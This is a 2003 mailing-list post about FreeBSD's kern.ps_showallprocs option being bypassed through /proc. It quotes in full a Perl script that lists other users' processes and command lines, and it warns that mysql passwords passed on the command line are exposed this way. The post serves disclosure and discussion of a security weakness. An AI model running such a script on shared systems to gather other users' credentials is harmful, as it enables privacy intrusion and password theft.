On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote: > This is a little information leak. This bug(?) is not dangerous, but > normal user can see all process on the box using ex. /bin/ps; This topic was addressed on freebsd-security list a while back, where someone also noted that all user process information can be obtained by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply by looking at the contents of /proc. The following script was also posted by someone to demonstrate this: #!/usr/bin/perl # # hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002 # author: JohnnyB # # a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0 # option; an option that hides other users process information. # (why would they implement such a broken and easily evaded option?) # [and no this didnt take any skill. its basically an output format] # # Tested on FreeBSD 4.5-RC. print "[USER] [GROUP] [PID] [FILE/ARGS]\n"; opendir(DIR,"/proc"); @procs=readdir(DIR); closedir(DIR); foreach ${proc} (@procs){ if(${proc}=~/[0-9]/o){ unshift(@pids, ${proc}); } } foreach $pid (@pids){ open(FD, "ls -al /proc/$pid/file|"); while(<FD>){ chomp; ${l}=$_; ${l}=~s/\s{1,}/ /g; if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){ &ppid(${1},${2},${pid},${3}); } } close(FD); } exit(0); sub ppid(){ (${a},${b},${c},${d})=@_; undef(${str}); undef(${line}); if(-e "/proc/$c/cmdline"){ open(heh,"cat /proc/$c/cmdline|"); @hah=<heh>; @chars=split(//,@hah[0]); foreach ${chr} (@chars){ if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){ ${str}.=" "; }else{ ${str}.=${chr}; } } ${line}.=${a}; while(length(${line})<11){${line}.=" ";} #alignment... ${line}.=" ".${b}; while(length(${line})<23){${line}.=" ";} ${line}.=" ".${c}; while(length(${line})<31){${line}.=" ";} chop(${str}); if(${d}eq"unknown"){ ${str}=~s/\s{1,}//g; ${line}.=" ("."${str}".")"; }else{ ${line}.=" "."${str}"; } @line=split(//,${line}); if(length(${line})>80){ ${cntr}=0; foreach ${char} (@line){ if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){ print "\n"." "x32; #^Anything >, deal with the rollover. } print "${char}"; ${cntr}++; } print "\n"; } else{ print "${line}\n"; } return(0); } } I believe someone (last poster in this thread?) also posted a patch on the same list, freebsd-security. It's annoying in that I see a lot of users running mysql with the -u and -p options: mysql -u user -p mypassword on the commandline, thinking that this info will not show up in ps listings when ps is run by other users. Ho hum... Regards, Jez Hancock
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